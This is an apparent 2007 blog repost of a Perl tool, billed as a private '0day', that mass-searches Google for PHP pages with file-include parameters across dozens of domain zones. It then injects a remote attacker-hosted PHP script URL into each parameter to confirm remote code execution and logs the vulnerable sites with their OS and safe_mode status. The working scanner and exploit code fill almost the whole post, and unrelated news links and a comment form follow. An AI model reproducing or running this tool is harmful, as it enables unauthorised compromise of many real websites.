google-php-include-bugs searcher v 0.8 ( 0day )

    [多云 May 5, 2007 22:51 | by ]
#! /usr/bin/perl
# ================================================================ #
#          google-php-include-bugs searcher v 0.8                  #
#                          (c)oded by drmist\STNC                  #
#                          www.security-teams.net                  #
#                                                                  #
#                 ATTENTION. THIS SCRIPT IS PRIVATE.               #
#              ONLY FOR STNC AND FRIENDS. NOT FOR SALE.            #
#                                                                  #
#  Usage: perl script.pl --log= --url=  #
#  Test script:                                                    #
#  #  error_reporting(0);                                             #
#  $s = md5("STNC");                                               #
#  $code = eregi("windows", php_uname())+                          #
#  2*eregi("apache", getenv("SERVER_SOFTWARE"))+                   #
#  4*ini_get('safe_mode'); echo $s."[$code]".$s;                   #
#  ?>                                                              #
# ================================================================ #


use IO::Socket;

@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat",
           "inc", "incl", "include", "read", "write", "data", "code", "fname",
    "filename", "cont", "content", "menu", "open", "file", "id", "p", "f",
    "seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo",
    "corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu",
    "conteudo");

@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am",
        "info", "name", "aero", "biz", "edu", "ws", "in",
 "cn", "us", "be", "it", "cc", "tv", "ru", "su",
 "jp", "kz", "se", "is", "ca", "gs", "ms", "vg",
 "be", "fi", "gov");

@ftypes = ("php", "php3");

$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");

for($i = 0; $i < @ARGV; $i++)
{
if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; }
elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; }
}

if(!($script && $log)){ usage(); exit; }

foreach $inc(@inc_bugs)
{
foreach $zone(@zones)
{
  foreach $ftype(@ftypes)
  {
    $request = "filetype:$ftype site:$zone inurl:$inc=";      
    print "\n[$request]\n";

    $request =~ s/(.)/sprintf("%%%02x",ord($1))/eg;
    @dn = ();

    for($i = 0;$i < 10; $i++)
    {
      @temp = get("//www.google.com/search?filter=0&num=100&start=".$i.
       "00&q=$request")  =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi;
      foreach $url (@temp)
{
 if($url !~ /($inc=[^\&]+)/i) { next; }
 $left = $`; $right = $';
 if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; }
 if($url =~ /google\.com/i){ next; }

 ($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/;
 if($domain =~ /^www\.(.+)$/) { $domain = $1; }
 $f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;}
 push @dn, $domain;

 $print = "$left$inc=[INCLUDE]$right";
 if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i)
 {
   $s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n";
   $count++;
   print "[$count] $s";

   open LOG, ">>$log";
   print LOG $s;
   close LOG;
 }
 else {
   print "$print - no bugs\n";
 }
}
    }
  }
}
}

sub timeout() { close $sock; }

sub get()
{
local $request = $_[0];
local $port = 80;
local $data = "";

if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
  if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }

  $sock = IO::Socket::INET->new(
    PeerAddr => $server,
    PeerPort => $port,
    Proto => 'tcp',
    Type => SOCK_STREAM,
    TimeOut => $timeout
  ) or return 0; # connection failed

  print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";

  $SIG{ALRM} = \&timeout; alarm 10;
  while(<$sock>){ $data .= $_; }
  alarm 0; close $sock;
}

return $data;
}

sub usage()
{

print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+
2*eregi("apache", getenv("SERVER_SOFTWARE"))+
4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
);

}
Tags: , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(13472)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive
 
  • 银行理财收益连续两周上涨 互联网宝宝跌破4% 2018-12-08
  • 恒动我“芯”—— HUAWEI WATCH尊赏沙龙即将亮相兰境艺术中心 2018-12-08
  • 【中国梦·践行者】亲身经历“失联”的等待 21岁CEO为留学生做“安保” 2018-12-07
  • 《四部医典》入选《世界记忆亚太地区名录》 2018-12-07
  • 抚州市12名处级干部正式任职 2018-07-26
  • 压倒性态势是如何形成的——党的十八大以来反腐倡廉工作综述 2018-07-25
  • 安徽一副县级干部严重违纪违法被“双开” 2018-07-25
  • 美最新研究:抑郁会引发记忆问题 2018-07-25
  • 《邪不压正》彭于晏廖凡合作姜文受益良多 2018-07-24
  • (Dos sesiones) El pueblo es el creador de la historia y el verdadero héroe, dice presidente chino Spanish.xinhuanet.com 2018-07-24
  • 《新时代·新征程十九大精神在基层》各地聚焦--甘肃频道--人民网 2018-07-24
  • 【一周"纪"录】"狐狸"外逃,海外群众也不会放过他们 2018-07-23
  • 航运大数据时代到来,订舱就像买机票? 2018-07-23
  • 山西省重要党务政务信息新闻发布会——黄河新闻网 2018-07-23
  • 地市链接--山西频道--人民网 2018-07-22
  • 396| 264| 823| 278| 251| 110| 880| 676| 626| 582|